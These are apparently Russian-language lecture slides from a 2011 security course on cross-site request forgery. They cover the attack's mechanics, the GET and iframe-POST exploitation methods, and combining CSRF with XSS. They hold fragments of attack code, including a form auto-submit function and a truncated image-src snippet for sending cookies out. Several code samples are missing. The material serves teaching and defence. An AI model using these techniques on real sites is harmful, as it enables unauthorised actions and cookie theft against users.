Open InfoSec Days Томск, 2011 Глава 1. Атаки на веб-приложения и методы защиты Занятие 2. Cross-site request forgery
Отказ от ответственности Информация предоставлена исключительно в ознакомительных целях. Всю ответственность за использование и применение полученных знаний каждый участник берет на себя
Сross Site Request Forgery CSRF (англ. Сross Site Request Forgery «Подделка межсайтовых запросов», также известен как XSRF) Вид атак на посетителей веб-сайтов, использующий недостатки протокола HTTP. Если жертва заходит на сайт, созданный злоумышленником, от её лица тайно отправляется запрос на другой сервер (например, на сервер платёжной системы), осуществляющий некую вредоносную операцию (например, перевод денег на счёт злоумышленника). Для осуществления данной атаки, жертва должна быть авторизована на том сервере, на который отправляется запрос, и этот запрос не должен требовать какого- либо подтверждения со стороны пользователя, который не может быть проигнорирован или подделан атакующим скриптом. Угрозы – Произвольные действия на целевом сайте без авторизации (отправка сообщений, смена секретного пароля) – Кража cookie (CSRF + Passive XSS)
Проблема. Пример кода Отсутсвие проверок на то, что пользователь действительно сам отправил форму
Эксплуатация GET – Подставить (к примеру) тэг и указать в нем адрес с нужным нам действием на целевом сайте. Действие выполнится с cookie посетителя POST – Посредством iframe и формы с POST запросом, в которой указаны значения нужных нам полей
Содержимое атакующей страницы function submit_form(){ window.evilframe.document.forms[0].submit(); } Содержимое form.html
CSRF + XSS 1.Заполнить через CSRF уязвимое место к XSS на сайте скриптом вида img = new Image(); img.src = "
Почитать Атака – Защита –